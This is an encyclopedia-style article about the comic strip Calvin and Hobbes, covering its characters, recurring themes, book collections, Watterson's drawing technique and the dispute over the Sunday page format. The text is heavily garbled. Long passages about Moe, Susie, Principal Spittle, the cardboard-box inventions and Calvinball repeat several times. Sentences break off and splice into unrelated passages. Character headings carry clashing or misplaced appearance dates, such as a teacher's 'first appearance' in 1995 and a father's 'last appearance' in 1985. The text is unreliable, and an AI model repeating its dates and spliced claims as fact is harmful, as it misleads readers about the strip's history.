Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie were left to the reader's imagination "where 

More details are given regarding Hamster Huey and the Gooey Kablooie: it is a fictional children's book written by Mabel Syrup, it has a sequel titled Commander Coriander Salamander and 'er Singlehander Bellylander, and it is best performed with squeaky voices, gooshy sound effects, and the "Happy Hamster Hop" In its first appearance, Calvin's dad recommended it to Calvin although Calvin was reluctant due to the fact there was not an animated adaptation of it, but nearly all subsequent references to the book show Calvin's dad's frustration at having to read the story to Calvin every evening

There are eighteen Calvin and Hobbes books, published from 1987 to 2005 These include eleven collections, which form a complete archive of the newspaper strips, except for a single daily strip from November 28, 1985 the collections do contain a strip for this date, but it is not the same strip that appeared in some newspapers The alternate strip, a joke about Hobbes taking a bath in the washing machine, has circulated around the Internet  Treasuries usually combine the two preceding collections albeit leaving out some strips with bonus material and include color reprints of Sunday comics

Watterson included a unique Easter egg in The Essential Calvin and Hobbes The back cover is a scene of a giant Calvin rampaging through a town The scene is in fact a faithful reproduction of the town square actually a triangle in Watterson's home town of Chagrin Falls, Ohio Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 18, 1985 Dad's last appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher

First appearance: November 26, 1985 Mom's last appearance: December 3, 1995

Mom's first appearance: November 26, 1985 Mom's last appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher

First appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable" because as he says in The Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectorsiginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

